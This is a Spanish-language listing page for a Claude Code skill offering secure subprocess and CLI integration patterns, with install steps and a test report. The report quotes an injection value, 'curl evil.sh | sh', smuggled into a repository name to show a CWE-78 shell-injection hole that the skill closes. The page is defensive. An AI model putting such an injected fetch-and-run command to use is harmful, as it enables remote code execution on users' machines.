API Integration Patterns

Patrones seguros de subprocesos de API/CLI: sin shell=True, comandos en lista blanca, retroceso de reintentos, validación de tokens.

Por akaszubski · akaszubski/autonomous-dev

Probado · Funciona ★ 8.4/10

API Integration Patterns — Patrones seguros de subprocesos de API/CLI: sin shell=True, comandos en lista blanca, retroceso de reintentos, validación de tokens.

Qué hace

Una skill de patrones de referencia que suministra patrones de código seguros para subprocesos, GitHub CLI, reintentos con retroceso, autenticación y limitación de velocidad cuando Claude escribe código de integración de API o CLI externa. Se activa ante palabras clave de subprocess/gh-cli/API-call/retry/auth y excluye explícitamente ediciones de funciones internas o solo de configuración.

Informe de la prueba

Prueba real CWE-78: el código de línea base usó shell=True con un nombre de repositorio f-string, permitiendo que un valor de repositorio manipulado añadiera 'curl evil.sh | sh'; la versión de skill con array argv + shell=False pasó la misma cadena maliciosa a través de gh como un argumento inerte. Concreto, no cosmético.

Probado el: 2026-07-15 · Claude Code 2.x (agent harness)

Instalación

git clone https://github.com/akaszubski/autonomous-dev
cd autonomous-dev
mkdir -p ~/.claude/skills
cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns

Comandos y prompts de ejemplo

  • /api-integration-patternsPatrones seguros de subprocesos de API/CLI: sin shell=True, comandos en lista blanca, retroceso de reintentos, validación de tokens.

Los skills se activan con peticiones en lenguaje natural, sin comandos que memorizar. Tras instalarlo, prompts como estos lo activan (en inglés):

  • Write a Python function that lists GitHub issues via the gh CLI
  • Add retry logic with exponential backoff to my API client code
  • Help me safely handle subprocess calls without shell injection risk